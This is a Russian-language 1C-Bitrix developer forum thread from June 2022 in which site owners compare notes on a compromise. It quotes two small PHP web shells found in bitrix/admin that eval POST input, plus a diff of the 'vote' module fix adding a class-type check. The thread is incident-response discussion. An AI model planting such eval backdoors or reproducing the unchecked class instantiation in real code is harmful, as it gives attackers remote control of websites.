1С-Битрикс Разработчикам

Заглянувший

Сообщений: 4 Регистрация: 22.08.2015

#131

29.06.2022 19:07:37

Коллеги, у кого появился файл /home/bitrix/www/bitrix/admin/sale_discount_heirlooms.php причем с выполнением агента?

Код
<?php Z647f323e(@$_POST['5cf118']); function Z647f323e($Jc9c9){ @eval($Jc9e8c9); } ?>

Хотя на другом ломаном сайте (сайт разработки полный клон основного, пока оставил не тронутым после атаки) на этом агенте выполнялся /home/bitrix/www/bitrix/admin/posting_brownier.php

С содержимым:

Код
<?php uf5985d(@$_POST['c5a776fd33']); function uf5985d($jb2e2995c){ @eval($jb2e2995c); } ?>

Раньше на этом агенте выполнялось

Код
CCaptchaAgent::DeleteOldCaptcha(3600);

И судя по дате агенты появились 27 июня. Основной сайт восстанавливал из вечернего бекапа от 27 июня.

Пользователь 1641101 Заглянувший Сообщений: 12 Баллов: 1 Регистрация: 27.12.2017	#132 0 29.06.2022 19:48:52 А про обновления что то слышали? Обновите свои сайты и не будет проблем, обновления не зря выпускают. Эти уязвимости закрыты еще в мае при обновлении.

Пользователь 125280

Посетитель

Сообщений: 28 Баллов: 4 Регистрация: 25.04.2012

#133

30.06.2022 03:16:00

Заглянул в обновление, сами уязвимые файлы в нем не тронуты, значит изменения где-то в другом месте. Может стоит выложить инструкцию где конкретно нужно пофиксить дыру в старых версиях - не всех клиентов получится оперативно обновить, у многих старые сайты с самописным функционалом, который частично отвалится при обновлении. Пофиксить дыру в их случае было бы проще, чем ловить баги на сайтах.

Пользователь 148160

Постоянный посетитель

Сообщений: 62 Баллов: 10 Регистрация: 13.11.2012

#134

30.06.2022 04:12:49

Цитата

написал:
Заглянул в обновление, сами уязвимые файлы в нем не тронуты, значит изменения где-то в другом месте. Может стоит выложить инструкцию где конкретно нужно пофиксить дыру в старых версиях - не всех клиентов получится оперативно обновить, у многих старые сайты с самописным функционалом, который частично отвалится при обновлении. Пофиксить дыру в их случае было бы проще, чем ловить баги на сайтах.

Код

Index: modules/vote/install/version.php
IDEA additional info:
Subsystem: com.intellij.openapi.diff.impl.patch.CharsetEP
<+>UTF-8
===================================================================
diff --git a/modules/vote/install/version.php b/modules/vote/install/version.php
--- a/modules/vote/install/version.php   (revision bed56ff9acf39ae04a93804a19687671562d7c98)
+++ b/modules/vote/install/version.php   (revision 3b4c2d42f4702b73499a7d2c1ab89a091d361159)
@@ -1,6 +1,5 @@
-<?
-$arModuleVersion = array(
-   "VERSION" => "21.0.0",
-   "VERSION_DATE" => "2021-03-09 16:30:00"
-);
-?>
\ No newline at end of file
+<?php
+$arModuleVersion = [
+   'VERSION' => '21.0.100',
+   'VERSION_DATE' => '2022-03-04 09:25:09'
+];
\ No newline at end of file
Index: modules/vote/lib/attachment/connector.php
IDEA additional info:
Subsystem: com.intellij.openapi.diff.impl.patch.CharsetEP
<+>UTF-8
===================================================================
diff --git a/modules/vote/lib/attachment/connector.php b/modules/vote/lib/attachment/connector.php
--- a/modules/vote/lib/attachment/connector.php   (revision bed56ff9acf39ae04a93804a19687671562d7c98)
+++ b/modules/vote/lib/attachment/connector.php   (revision 3b4c2d42f4702b73499a7d2c1ab89a091d361159)
@@ -30,12 +30,13 @@
       }
       $className = str_replace('\\\\', '\\', $attachedObject->getEntityType());
       /** @var \Bitrix\Vote\Attachment\Connector $connector */
+      if (!is_a($className, Connector::class, true))
+      {
+         throw new ObjectNotFoundException('Connector class should be instance of Bitrix\Vote\Attachment\Connector.');
+      }
+
       $connector = new $className($attachedObject->getEntityId());
 
-      if(!$connector instanceof Connector)
-      {
-         throw new ObjectNotFoundException('Connector class should be instance of Connector.');
-      }
       if($connector instanceof Storable)
       {
          $connector->setStorage($attachedObject->getStorage());
Index: modules/vote/lib/uf/manager.php
IDEA additional info:
Subsystem: com.intellij.openapi.diff.impl.patch.CharsetEP
<+>UTF-8
===================================================================
diff --git a/modules/vote/lib/uf/manager.php b/modules/vote/lib/uf/manager.php
--- a/modules/vote/lib/uf/manager.php   (revision bed56ff9acf39ae04a93804a19687671562d7c98)
+++ b/modules/vote/lib/uf/manager.php   (revision 3b4c2d42f4702b73499a7d2c1ab89a091d361159)
@@ -3,6 +3,7 @@
 namespace Bitrix\Vote\Uf;
 
 use Bitrix\Vote\Attach;
+use Bitrix\Vote\Attachment\Connector;
 use Bitrix\Vote\Attachment\DefaultConnector;
 use Bitrix\Vote\Attachment\BlogPostConnector;
 use Bitrix\Vote\Attachment\ForumMessageConnector;
@@ -115,7 +116,7 @@
       $id1 = VoteUserType::NEW_VOTE_PREFIX.$id;
       if(!isset($this->loadedAttachedObjects[$id1]))
       {
-         list($entityType, $moduleId) = $this->getConnectorDataByEntityType($this->params["ENTITY_ID"]);
+         [$entityType, $moduleId] = $this->getConnectorDataByEntityType($this->params["ENTITY_ID"]);
          $attach = \Bitrix\Vote\Attachment\Manager::loadFromVoteId(array(
             "ENTITY_ID" => ($this->params["ENTITY_VALUE_ID"] ?: $this->params["VALUE_ID"]), // http://hg.office.bitrix.ru/repos/modules/rev/b614a075ce64
             "ENTITY_TYPE" => $entityType,
@@ -130,7 +131,7 @@
     */
    public function loadEmptyObject()
    {
-      list($entityType, $moduleId) = $this->getConnectorDataByEntityType($this->params["ENTITY_ID"]);
+      [$entityType, $moduleId] = $this->getConnectorDataByEntityType($this->params["ENTITY_ID"]);
       return \Bitrix\Vote\Attachment\Manager::loadEmptyAttach(array(
          "ENTITY_ID" => ($this->params["ENTITY_VALUE_ID"] ?: $this->params["VALUE_ID"]), // http://hg.office.bitrix.ru/repos/modules/rev/b614a075ce64,
          "ENTITY_TYPE" => $entityType,
@@ -144,7 +145,7 @@
     */
    public function loadFromEntity()
    {
-      list($entityType, $moduleId) = $this->getConnectorDataByEntityType($this->params["ENTITY_ID"]);
+      [$entityType, $moduleId] = $this->getConnectorDataByEntityType($this->params["ENTITY_ID"]);
       $res = array(
          "ENTITY_ID" => ($this->params["ENTITY_VALUE_ID"] ?: $this->params["VALUE_ID"]), // http://hg.office.bitrix.ru/repos/modules/rev/b614a075ce64
          "=ENTITY_TYPE" => $entityType,
@@ -160,7 +161,7 @@
     */
    public function belongsToEntity(Attach $attachedObject, $entityType, $entityId)
    {
-      list($connectorClass, $moduleId) = $this->getConnectorDataByEntityType($entityType);
+      [$connectorClass, $moduleId] = $this->getConnectorDataByEntityType($entityType);
 
       return
          $attachedObject->getEntityId()   == $entityId &&
@@ -257,7 +258,7 @@
                throw new SystemException('Wrong event result by building AdditionalConnectorList. Could not find CLASS.');
             }
 
-            if(is_string($connector['CLASS']) && class_exists($connector['CLASS']))
+            if(is_string($connector['CLASS']) && class_exists($connector['CLASS']) && is_a($connector['CLASS'], Connector::class, true))
             {
                $this->additionalConnectorList[mb_strtolower($connector['ENTITY_TYPE'])] = array(
                   $connector['CLASS'],

Пользователь 11847

Эксперт

Сообщений: 1141 Баллов: 196 Регистрация: 15.05.2007

#135

30.06.2022 04:44:26

Благодарность за выкладку изменений!
Хм, у меня нет такого модуля, а на 2х из 3х сайтах в upload появились какие то лишние файлы. Значит правка только в файлах модуля vote будет не достаточна для закрытия дыры.
P.s. - зачем до сегодняшних проблем было обновлять битрикс, если все работало отлично на небольших информационных сайтах
P.s.P.s. Подумываю о переносе сайтjd с битрикса на что то другое (да хотя бы на WP)

www.alfoweb.ru

Пользователь 431805

Постоянный посетитель

Сообщений: 58 Баллов: 10 Регистрация: 13.01.2016

#136

30.06.2022 09:03:10

только не забываем, что нужно тогда обновляться до php7.4, чтобы работал новый функционал, это если говорить о глобальном обновлении. а , если обновить до php 7.4 сервер, где установлена версия <=20, то отвалится функционал этой версии и надо будет вручную там править файлы. вот такая дилема :-)

,

Ну, из приведенных Вами изменений можно отметить только проверку имени класса - то, что это экземпляр Connector, которая проводится до создания класса. Но, мне кажется, что если это все изменения в vote, то дело было явно не в нем.

Как по мне, то решением невыполнения скриптов в upload является его перенос выше директории, где прописано обрабатывание скриптов(обычно /var/www/Папка_С_Битрикс) и создание символической ссылки @upload в корне сайта на эту директорию.

Пользователь 5722388 Заглянувший Сообщений: 1 Регистрация: 12.11.2021	#137 0 30.06.2022 10:31:48 Коллеги, видим в журнале событий следующий вариант: Прикрепленные файлы 1656574208338.jpg (301.12 КБ)

Пользователь 5873954 Заглянувший Сообщений: 3 Регистрация: 27.12.2021	#138 0 30.06.2022 11:06:36 Если обновится, спасает?

Пользователь 104919 Заглянувший Сообщений: 10 Регистрация: 14.03.2012	#139 1 30.06.2022 11:10:57 Обновления не спасают! После восстановления и обновления, снова вижу новые загруженные файлы в /upload/ и снова появилась ошибка при редактировании юзеров: Crypto is not available

Пользователь 5873954

Заглянувший

Сообщений: 3 Регистрация: 27.12.2021

#140

30.06.2022 11:25:48

Цитата
написал: Обновления не спасают! После восстановления и обновления, снова вижу новые загруженные файлы в /upload/ и снова появилась ошибка при редактировании юзеров: Crypto is not available

Есть варианты решения?

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером